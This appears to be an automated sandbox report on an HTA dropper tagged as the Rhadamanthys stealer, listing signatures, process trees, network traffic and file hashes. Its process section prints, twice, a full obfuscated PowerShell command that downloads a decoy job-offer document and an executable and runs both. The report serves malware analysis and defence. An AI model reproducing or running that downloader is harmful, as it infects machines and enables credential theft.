Malware Analysis Report

2024-11-30 02:18

Sample ID 241102-dc3w6axhrh
Target 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta
SHA256 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302
Tags
discovery execution rhadamanthys persistence stealer
score
10/10

Analysis Overview

score
10/10

SHA256

1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302

Threat Level: Known bad

The file 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta was found to be: Known bad.

Malicious Activity Summary

discovery execution rhadamanthys persistence stealer

Rhadamanthys

Rhadamanthys family

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Modifies Internet Explorer settings

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 02:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 02:52

Reported

2024-11-02 02:55

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

Network

Country Destination Domain Proto
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp

Files

memory/1848-2-0x0000000002F00000-0x0000000002F40000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-02 02:52

Reported

2024-11-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3648 created 2648 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GifCamVideoEditor = "C:\\Users\\Admin\\Music\\GifCamUpdater\\GifCamOculus.exe" C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 944 set thread context of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\openwith.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 1548 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1548 wrote to memory of 3488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1548 wrote to memory of 3488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1548 wrote to memory of 944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 944 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 3648 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""

C:\Users\Admin\AppData\Roaming\Xteam30.exe

"C:\Users\Admin\AppData\Roaming\Xteam30.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 218.176.139.118.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 136.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgd1behk.m4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx

MD5 65d4be8afc700f773c79a0d89da13ec5
SHA1 f1bc5b54ee151155e8a85ca61ff1bea7295ee38d
SHA256 2189f8a864e30bf54fc7003c5d63ebfa143c6a07eca060638d30b0a473a97988
SHA512 25244cb6e322c39e7ef8bc1216280730be3927935a315174c1a75110257893f0d6ef41083e5409397396d8974c2fd2caf7003a20ff91de5c6462394d992e3a87

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 688a9dd38edb9f52f60fcb2e19c06969
SHA1 f8af4a9bb71dc47f3d5fda352e2e1f2106eb59a8
SHA256 9f841d9d87b55c79f79ac1abbf06d2e94713be06965c85c0f9fbc3f83d6536e5
SHA512 bfd5f29dc546efdb7a405f5aaffb98a05ec42c33644cfef98d8a21422ecb714bafb9c1de57e3fb25f5daf56665b24e48ab1578e6f185d3458b709b11b7c8c6e0

C:\Users\Admin\AppData\Roaming\Xteam30.exe

MD5 421700a2d6d8516013d87e04628d2802
SHA1 f738ae62f1016c0667115665c42e71d85cfb4d38
SHA256 cc00a259ec4ebde015fe0fad59f369ae23def081caa787ad0652f7d6b2fe6de0
SHA512 c411036515d4046ba62370c2f27e32d414273dc2e4004b9c4396c3518f951ef97c717ab532dd52100f2950e137249462495b376b8d89adde4c3f89292e9f70e6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 62ba8b165930dce4bb07a8e20c42712d
SHA1 0fcf5006634a6972a992d0405fa7906f8fb13146
SHA256 3e9c12c29ff3609743fad39a6ff021faa20c293789762115c04795d451ff636f
SHA512 084d12180a08bf1d251fbd1614deeaad74160d88a0bfb5f1ca16caca33bef4fa322b19f4202b286653804cbdacb0e78c43b85e548da541b290e5a1a0708ac6f5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 7f6ccdc9dd29daacb943094125a930c7
SHA1 19b6ccaef0ecd2eed6f2a563f81ee415d1750780
SHA256 bcce5f2390b586bb54c14af5f45fc5a22ad44ba29cd3438191e393afbfdc7455
SHA512 5692482c22f59c6c2fe27d8dbcdda21d74d1bd73c6a89314db55153a564fed02a42047e81b8d6a9f05ca700affbee326c9bcb576c84940f5809756408921d534

C:\Users\Admin\AppData\Local\Temp\TCDD9C2.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
